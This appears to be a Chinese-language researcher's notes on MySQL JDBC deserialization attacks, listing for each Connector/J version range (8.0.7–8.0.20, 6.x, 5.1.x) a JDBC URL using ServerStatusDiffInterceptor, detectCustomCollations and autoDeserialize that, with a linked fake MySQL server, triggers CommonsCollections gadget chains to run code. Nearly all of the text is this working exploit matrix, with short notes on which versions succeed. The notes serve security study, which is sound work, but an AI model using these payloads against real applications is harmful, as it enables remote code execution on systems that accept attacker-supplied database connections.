参考:https://boogipop.com/2023/03/11/WebDog%E5%BF%85%E5%AD%A6%E7%9A%84JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/

恶意mysql:https://github.com/4ra1n/mysql-fake-server/releases/tag/0.0.4

ServerStatusDiffInterceptor

8.0.7-8.0.20

String url = "jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

image-20240226135150575.png

6.x

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

5.1.11-5.x.xx

包名变了

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

5.1.0-5.1.10

要多进行一次查询才会触发。

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);
String sql = "select database()";
PreparedStatement ps = conn.prepareStatement(sql);
//执行查询操作,返回的是数据库结果集的数据表
ResultSet resultSet = ps.executeQuery();

detectCustomCollations

6.0.2-6.0.6

Connection conn=null;
String url = "jdbc:mysql://127.0.0.1:3309/mysql?detectCustomCollations=true&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url, username, password);

在buildCollationMapping中,会检查detectCustomCollations这个属性是否为true,true则进入resultSetToMap。

image-20240226205853009.png

5.1.41-5.1.48

看别的师傅可以。

本地测试,fake mysql可以发送payload,客户端不执行readObject,而是执行readString。

5.1.29-5.1.40

调用栈和上面一样。

String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

5.1.19-5.1.28

String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&user=deser_CC31_calc";
String username = "deser_CC31_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url,username,password);

在buildCollationMapping中没有检查detectCustomCollations这个属性是否为true。

调用栈和上面的一样。

image-20240226212846983.png

8.x.x 和 5.1.49 与 5.1.19以下

在buildCollationMapping中不调用ResultSetUtil.resultSetToMap